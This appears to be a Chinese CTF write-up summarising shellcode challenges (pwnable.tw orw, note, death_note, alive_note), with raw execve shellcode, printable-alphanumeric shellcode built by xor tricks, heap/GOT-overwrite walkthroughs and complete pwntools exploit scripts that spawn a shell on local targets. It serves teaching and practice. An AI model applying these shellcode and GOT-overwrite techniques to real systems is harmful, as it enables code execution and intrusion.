序言: 平时做题也遇到过一些编写shellcode的题目了,最近抽空总结下类型,以及编写过程
比如 pwntools的 shellcraft模块
这种题好做,利用工具生成,比如pwnable.tw 的 orw,这题就是可以直接利用工具生成的
shellcode = shellcraft.open('/home/orw/flag') shellcode += shellcraft.read('eax','esp', 0x30) shellcode += shellcraft.write(1, 'esp', 0x30)
shellcode = asm(''' push 0x67616c66 mov rdi,rsp xor esi,esi push 2 pop rax syscall mov rdi,rax mov rsi,rsp mov edx,0x100 xor eax,eax syscall mov edi,1 mov rsi,rsp push 1 pop rax syscall ''')
shellcode = "\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x57\x54\x5e\x0f\x05"
0xE8 CALL 后面的四个字节是地址
0xE9 JMP 后面的四个字节是偏移
0xEB JMP 后面的二个字节是偏移
0xFF15 CALL 后面的四个字节是存放地址的地址
0xFF25 JMP 后面的四个字节是存放地址的地址
0x68 PUSH 后面的四个字节入栈
0x6A PUSH 后面的一个字节入栈
发觉有个double free,然后8个字节不知道怎么利用,然后卡死了
其余指令可以用pwntools测试,asm('xor rsi,rsi',arch='amd64')
free_got - heap地址,这个相对偏移是确定的,所以可以用index这样寻址
0x1000 E9 16 00 00 00 0x1005 90 0x1006 90 . . . 0x101b 90
0x00 0 0x21 0x10 0 0 0x20 0 0x21 0x30 0 0 0x40 0 0x21 0x50 0 0 0x60 0 0x21 0x70 0 0
0x00 0 0x21 0x10 00000018e94831f6 0 0x20 0 0x21 0x30 0 0 0x40 0 0x21 0x50 0 0 0x60 0 0x21 0x70 0 0
0x00 0 0x21 0x10 00000018e94831f6 0 0x20 0 0x21 0x30 00000018e94831d2 0 0x40 0 0x21 0x50 0 0 0x60 0 0x21 0x70 0 0
0x00 0 0x21 0x10 00000018e94831f6 0 0x20 0 0x21 0x30 00000018e94831d2 0 0x40 0 0x21 0x50 00000018e9586a3b 0 0x60 0 0x21 0x70 0 0
0x00 0 0x21 0x10 00000018e94831f6 0 0x20 0 0x21 0x30 00000018e94831d2 0 0x40 0 0x21 0x50 00000018e9586a3b 0 0x60 0f05 0x21 0x70 0 0
0x00 0 0x21 0x10 16e99090904831f6 0 0x20 0 0x21 0x30 16e99090904831d2 0 0x40 0 0x21 0x50 16e9909090586a3b 0 0x60 9090909090900f50 0x21 0x70 0 0
0x00 0 0x21 0x10 0016e990904831f6 0 0x20 0 0x21 0x30 0016e990904831d2 0 0x40 0 0x21 0x50 0016e99090586a3b 0 0x60 0090909090900f50 0x21 0x70 0 0
#!/usr/bin/env python2 # -*- coding: utf-8 -*- from pwn import * local = 1 host = '' port = 49964 context.log_level = 'debug' exe = '/tmp/tmp.sGaluM2IXs/note' # Load it if has exe try: context.binary = exe elf = ELF(exe) except Exception as e: print("Elf can't be load") # load libc libc = elf.libc if context.binary else ELF("./libc.so.6") if local: io = process(exe) else: io = remote(host,port, timeout=10) #don't forget to change it s = lambda data : io.send(str(data)) sa = lambda delim,data : io.sendafter(str(delim), str(data)) sl = lambda data : io.sendline(str(data)) sla = lambda delim,data : io.sendlineafter(str(delim), str(data)) r = lambda numb=4096 : io.recv(numb) rl = lambda : io.recvline() ru = lambda delim,drop=True : io.recvuntil(delim, drop) rg = lambda regex : io.recvregex(regex) rp = lambda timeout=1 : io.recvrepeat(timeout) uu32 = lambda data : u32(data.ljust(4, '\x00')) uu64 = lambda data : u64(data.ljust(8, '\x00')) lg = lambda s,addr : io.success('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr)) ga = lambda job="" : gdb.attach(io, job) if local else 0 ia = lambda : io.interactive() # break on aim addr def debug(addr,PIE=True): if PIE: text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(io.pid)).readlines()[1], 16) ga('b *{}'.format(hex(text_base+addr))) else: ga("b *{}".format(hex(addr))) # get_one_gadget def get_one_gadget(filename): return map(int, os.popen("one_gadget --raw " + filename).readlines()[0].split(' ')) #=========================================================== # EXPLOIT GOES HERE #=========================================================== # Arch: amd64-64-little # RELRO: Partial RELRO # Stack: Canary found # NX: NX disabled # PIE: PIE enabled # RWX: Has RWX segments def c(idx): sla(">> ", idx) def new(idx, content): c(1) sla(":", idx) sla(":", 8) sa(":", content) def delete(idx): c(4) sla(":", idx) def exp(host, rce=False): if rce: one_gadget = get_one_gadget(libc.path) #start here new(0, '/bin/sh') new((elf.got['free']-0x2020A0)/8, asm('xor rsi,rsi')+ '\x90\x90\xe9\x16') new(1, asm('push 0x3b\n pop rax') + '\x90\x90\xe9\x16') new(2, asm('xor rdx, rdx') + '\x90\x90\xe9\x16') new(3, asm('syscall') + '\x90'*5) ga() delete(0) ia() if __name__ == '__main__': exp(host,)
1.数据传送: push/pop eax… pusha/popa 2.算术运算: inc/dec eax… sub al, 立即数 sub byte ptr [eax… + 立即数], al dl… sub byte ptr [eax… + 立即数], ah dh… sub dword ptr [eax… + 立即数], esi edi sub word ptr [eax… + 立即数], si di sub al dl…, byte ptr [eax… + 立即数] sub ah dh…, byte ptr [eax… + 立即数] sub esi edi, dword ptr [eax… + 立即数] sub si di, word ptr [eax… + 立即数] 3.逻辑运算: and al, 立即数 and dword ptr [eax… + 立即数], esi edi and word ptr [eax… + 立即数], si di and ah dh…, byte ptr [ecx edx… + 立即数] and esi edi, dword ptr [eax… + 立即数] and si di, word ptr [eax… + 立即数] xor al, 立即数 xor byte ptr [eax… + 立即数], al dl… xor byte ptr [eax… + 立即数], ah dh… xor dword ptr [eax… + 立即数], esi edi xor word ptr [eax… + 立即数], si di xor al dl…, byte ptr [eax… + 立即数] xor ah dh…, byte ptr [eax… + 立即数] xor esi edi, dword ptr [eax… + 立即数] xor si di, word ptr [eax… + 立即数] 4.比较指令: cmp al, 立即数 cmp byte ptr [eax… + 立即数], al dl… cmp byte ptr [eax… + 立即数], ah dh… cmp dword ptr [eax… + 立即数], esi edi cmp word ptr [eax… + 立即数], si di cmp al dl…, byte ptr [eax… + 立即数] cmp ah dh…, byte ptr [eax… + 立即数] cmp esi edi, dword ptr [eax… + 立即数] cmp si di, word ptr [eax… + 立即数] 5.转移指令: push 56h pop eax cmp al, 43h jnz lable <=> jmp lable 6.交换al, ah push eax xor ah, byte ptr [esp] // ah ^= al xor byte ptr [esp], ah // al ^= ah xor ah, byte ptr [esp] // ah ^= al pop eax 7.清零: push 44h pop eax sub al, 44h ; eax = 0 push esi push esp pop eax xor [eax], esi ; esi = 0
eax=0xb ecx=0 ebx= /bin/sh地址 edx = 0
>>> asm(shellcraft.sh()) 'jhh///sh/bin\x89\xe3h\x01\x01\x01\x01\x814$ri\x01\x011\xc9Qj\x04Y\x01\xe1Q\x89\xe11\xd2j\x0bX\xcd\x80'
push 0x68 push 0x732f2f2f push 0x6e69622f mov ebx, esp
然后修改代码,mov ebx,esp改成push esp, pop ebx
push 0x68 #push /bin/sh push 0x732f2f2f push 0x6e69622f push esp pop ebx
push ecx pop eax xor al,0x41 xor al,0x40
push ecx pop eax xor al,0x41 xor al,0x40 push edx pop ecx push 0x68 #push /bin/sh push 0x732f2f2f push 0x6e69622f push esp pop ebx
最前面来构造int 0x80,因为此时堆块地址还未被破坏,
push eax #堆块地址 pop ebx #保存堆块地址到ebx push edx pop eax dec eax #构造0xff xor al,0x46 #al = 0xb9 xor byte ptr[ebx+0x35],al #set int 0x80 xor byte ptr[ebx+0x36],al
push ecx pop eax xor al,0x41 xor al,0x40
push eax #堆块地址 pop ebx #保存堆块地址到ebx push edx pop eax dec eax #构造0xff xor al,0x46 #al = 0xb9 xor byte ptr[ebx+0x35],al #set int 0x80 xor byte ptr[ebx+0x36],al push ecx pop eax xor al,0x41 xor al,0x40 push ecx pop eax xor al,0x41 xor al,0x40 push ecx pop eax xor al,0x41 xor al,0x40 push ecx pop eax xor al,0x41 xor al,0x40 push edx pop ecx push 0x68 #push /bin/sh push 0x732f2f2f push 0x6e69622f push esp pop ebx
最后加上'\x74\x39'这个,拿来构造int 0x80的,就好了
#!/usr/bin/env python2 # -*- coding: utf-8 -*- from pwn import * local = 1 host = '' port = 10000 context.log_level = 'debug' exe = './death_note' # Load it if has exe try: context.binary = exe elf = ELF(exe) except Exception as e: print("Elf can't be load") # load libc libc = elf.libc if context.binary else ELF("./libc.so.6") if local: io = process(exe) else: io = remote(host,port, timeout=10) #don't forget to change it s = lambda data : io.send(str(data)) sa = lambda delim,data : io.sendafter(str(delim), str(data)) sl = lambda data : io.sendline(str(data)) sla = lambda delim,data : io.sendlineafter(str(delim), str(data)) r = lambda numb=4096 : io.recv(numb) rl = lambda : io.recvline() ru = lambda delim,drop=True : io.recvuntil(delim, drop) rg = lambda regex : io.recvregex(regex) rp = lambda timeout=1 : io.recvrepeat(timeout) uu32 = lambda data : u32(data.ljust(4, '\x00')) uu64 = lambda data : u64(data.ljust(8, '\x00')) lg = lambda s,addr : io.success('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr)) ga = lambda job="" : gdb.attach(io, job) if local else 0 ia = lambda : io.interactive() # break on aim addr def debug(addr,PIE=True): if PIE: text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(io.pid)).readlines()[1], 16) ga('b *{}'.format(hex(text_base+addr))) else: ga("b *{}".format(hex(addr))) # get_one_gadget def get_one_gadget(filename): return map(int, os.popen("one_gadget --raw " + filename).readlines()[0].split(' ')) #=========================================================== # EXPLOIT GOES HERE #=========================================================== # Arch: i386-32-little # RELRO: Partial RELRO # Stack: Canary found # NX: NX disabled # PIE: No PIE (0x8048000) # RWX: Has RWX segments def c(idx): sla(":", idx) def new(idx, content): c(1) sla(":", idx) sla(":", content) def delete(idx): c(3) sla(":", idx) def exp(host, rce=False): if rce: one_gadget = get_one_gadget(libc.path) #start here offset = (elf.got['free']-0x0804A060)/4 #ga("b *0x8048865\nc\nn 4\ns") shellcode = asm(''' push eax pop ebx #保存指针 push edx pop eax dec eax xor al,0x46 xor byte ptr[ebx+0x35],al #set int 0x80 xor byte ptr[ebx+0x36],al push ecx #这里作为滑板,填充数据 pop eax xor al, 0x41 xor al, 0x40 push ecx pop eax xor al, 0x41 xor al, 0x40 push ecx pop eax xor al, 0x41 xor al, 0x40 push ecx # set al=0xb pop eax xor al, 0x41 xor al, 0x40 push edx # set ecx=0 pop ecx push 0x68 # push /bin/sh push 0x732f2f2f push 0x6e69622f push esp pop ebx ''') lg("len", len(shellcode)) shellcode += '\x74\x39' new(offset, shellcode) delete(offset) ia() if __name__ == '__main__': exp(host,)
整体思路是通过构造shellcode链, 然后read(0,heap,size),读入shellcode执行, 这样就可以有非限制字符了
push eax pop ecx push 0x7a pop edx push ebx jne 0x3a #因为跳到0x38处,要减去2,指令长度为2
顺序: 1->5->2->6->4
['0x0', '0x20', '0x30', '0x31', '0x32', '0x33', '0x34', '0x35', '0x36', '0x37', '0x38', '0x39', '0x41', '0x42', '0x43', '0x44', '0x45', '0x46', '0x47', '0x48', '0x49', '0x4a', '0x4b', '0x4c', '0x4d', '0x4e', '0x4f', '0x50', '0x51', '0x52', '0x53', '0x54', '0x55', '0x56', '0x57', '0x58', '0x59', '0x5a', '0x61', '0x62', '0x63', '0x64', '0x65', '0x66', '0x67', '0x68', '0x69', '0x6a', '0x6b', '0x6c', '0x6d', '0x6e', '0x6f', '0x70', '0x71', '0x72', '0x73', '0x74', '0x75', '0x76', '0x77', '0x78', '0x79', '0x7a']
0x0: 0x00000000 0x00000011 0x31000000 0x00000000 #堆块1完成 0x10: 0x00000000 0x00000011 0x32000000 0x00000000 0x20: 0x00000000 0x00000011 0x33000000 0x00000000 0x30: 0x00000000 0x00000011 0x34000000 0x00000000 0x40: 0x00000000 0x00000011 0x35000000 0x00000000 #堆块5完成 0x50: 0x00000000 0x00000011 0x36000000 0x00000000
jne跳转计算为0x48-0x10=0x38,所以第一个跳就是jne 0x3a,因为要-2,这个机器码对应的才是跳0x38
>>> hex(0x18-0x4d & 0xff) '0xcb'
所以jne 0xcb是我们想要的结果,然后这个对应的机器码为75C9,其实0xcb可以不用计算器算,用吾爱工具跳转指令计算器0.4b计算的我是,找了好久才用他,输入0x4d和0x18 就出来了,接下来将C9转换成可见字符,
xor byte ptr[ecx+0x46]
pop eax dec eax #eax变为0xffffffff xor byte ptr[ecx+0x46],al #合起来5个字节 0x46上面刚计算 jne 0xcb # 这里是75C9,转变C9与0xff异或为0x36所以最终为7536
0x0: 0x00000000 0x00000011 0x31000000 0x00000000 #1完成 0x10: 0x00000000 0x00000011 0x32000000 0x00000000 0x20: 0x00000000 0x00000011 0x33000000 0x00000000 0x30: 0x00000000 0x00000011 0x34000000 0x00000000 0x40: 0x00000000 0x00000011 0x35000000 0x00000000 #5完成 0x50: 0x00000000 0x00000011 0x36000000 0x00000000
参数已经设置好了,现在最主要要构造int 0x80了,所以就是xor变成int 0x80
我们将int 0x80放在最后一个执行的堆块里,就是第4块堆块,所以还是得先设置第四块
pop eax xor al,0x33 xor al,0x30 #5个字节 int 0x80 #本来是\xcd\x80,两个都不可见,所以要将其变为可见,回到第二块堆块
0x0: 0x00000000 0x00000011 0x31000000 0x00000000 #1完成 0x10: 0x00000000 0x00000011 0x32000000 0x00000000 0x20: 0x00000000 0x00000011 0x33000000 0x00000000 0x30: 0x00000000 0x00000011 0x34000000 0x00000000 #4完成 0x40: 0x00000000 0x00000011 0x35000000 0x00000000 #5完成 0x50: 0x00000000 0x00000011 0x36000000 0x00000000
xor al,0x46 #al=0xb9 xor byte ptr[ecx+0x35],al push ebx #为第四块的pop eax做准备 jne 0x3a #同理跳到第六块去
pop eax xor al,0x33 xor al,0x30 #5个字节 int 0x80 #现在变成\x74\x80
0x0: 0x00000000 0x00000011 0x31000000 0x00000000 #1完成 0x10: 0x00000000 0x00000011 0x32000000 0x00000000 #2完成 0x20: 0x00000000 0x00000011 0x33000000 0x00000000 0x30: 0x00000000 0x00000011 0x34000000 0x00000000 #4完成 0x40: 0x00000000 0x00000011 0x35000000 0x00000000 #5完成 0x50: 0x00000000 0x00000011 0x36000000 0x00000000
xor byte ptr[ecx+0x36],al #int 0x80设置好了,3个字节 xor byte ptr[ecx+0x57],al # 在三个字节,将d8转化 0x5f-0x8 jne 0xda #0x5e跳到0x38, 原机器码75d8,d8转为61,所以变为7561
pop eax xor al,0x33 xor al,0x30 #5个字节 int 0x80 #现在变成\x74\x39
>>> hex(0xb9^0x80) '0x39'
0x0: 0x00000000 0x00000011 0x31000000 0x00000000 #1完成 0x10: 0x00000000 0x00000011 0x32000000 0x00000000 #2完成 0x20: 0x00000000 0x00000011 0x33000000 0x00000000 #3随便填充就好 0x30: 0x00000000 0x00000011 0x34000000 0x00000000 #4完成 0x40: 0x00000000 0x00000011 0x35000000 0x00000000 #5完成 0x50: 0x00000000 0x00000011 0x36000000 0x00000000 #6完成
>>> p64(0x3875535a7a6a5950) 'PYjzZSu8'
>>> p64(0x3875533541304634) '4F0A5Su8'
第三段: 随便
>>> p64(0x39743034333458) 'X4340t9\x00'
>>> p64(0x36754641304858) 'XH0AFu6\x00'
>>> p64(0x6175574130364130) '0A60AWua'
所以就是’a'*0x37 + asm(shellcraft.sh())
#!/usr/bin/env python2 # -*- coding: utf-8 -*- from pwn import * local = 1 host = '' port = 10000 #context.log_level = 'debug' exe = './alive_note' # Load it if has exe try: context.binary = exe elf = ELF(exe) except Exception as e: print("Elf can't be load") # load libc libc = elf.libc if context.binary else ELF("./libc.so.6") if local: io = process(exe) else: io = remote(host,port, timeout=10) #don't forget to change it s = lambda data : io.send(str(data)) sa = lambda delim,data : io.sendafter(str(delim), str(data)) sl = lambda data : io.sendline(str(data)) sla = lambda delim,data : io.sendlineafter(str(delim), str(data)) r = lambda numb=4096 : io.recv(numb) rl = lambda : io.recvline() ru = lambda delim,drop=True : io.recvuntil(delim, drop) rg = lambda regex : io.recvregex(regex) rp = lambda timeout=1 : io.recvrepeat(timeout) uu32 = lambda data : u32(data.ljust(4, '\x00')) uu64 = lambda data : u64(data.ljust(8, '\x00')) lg = lambda s,addr : io.success('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr)) ga = lambda job="" : gdb.attach(io, job) if local else 0 ia = lambda : io.interactive() # break on aim addr def debug(addr,PIE=True): if PIE: text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(io.pid)).readlines()[1], 16) ga('b *{}'.format(hex(text_base+addr))) else: ga("b *{}".format(hex(addr))) # get_one_gadget def get_one_gadget(filename): return map(int, os.popen("one_gadget --raw " + filename).readlines()[0].split(' ')) #=========================================================== # EXPLOIT GOES HERE #=========================================================== # Arch: i386-32-little # RELRO: Partial RELRO # Stack: Canary found # NX: NX disabled # PIE: No PIE (0x8048000) # RWX: Has RWX segments def fuzz(char): new(0, char) show(0) print(rl()) List = [0, 32, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122] List = [chr(i) for i in List] def checkPayload(payload): for i in payload: if i in List: return False return True def c(idx): sla(":", idx) def new(idx, name): c(1) sla(":", idx) if checkPayload(name): print("payload is wrong") exit(0) else: sla(":", name) def show(idx): c(2) sla(":", idx) def delete(idx): c(3) sla(":", idx) def exp(host, rce=False): if rce: one_gadget = get_one_gadget(libc.path) #start here ''' PYjzZSu8 4F0A5Su8 11111111 X4340t9 XH0AFu6 0A60AWua ''' # offset = free_got - heap offset = (0x0804a014-0x0804A080)/4 ga("b *0x080488DC\n c\nn 4\ndelete\ns\n") new(offset, 'PYjzZSu8') new(0, '4F0A5Su8') new(1, '11111111') new(2, 'X4340t9') new(3, 'XH0AFu6') new(4, '0A60AWua') delete(offset) s(0x37*'a' + asm(shellcraft.sh())) #ga() ia() if __name__ == '__main__': # fuzz the input name ''' List = [] for i in range(0, 128): try: fuzz(chr(i)) io.close() List.append(i) except Exception as e: print(e) finally: io = process(exe) print(List) ''' exp(host,)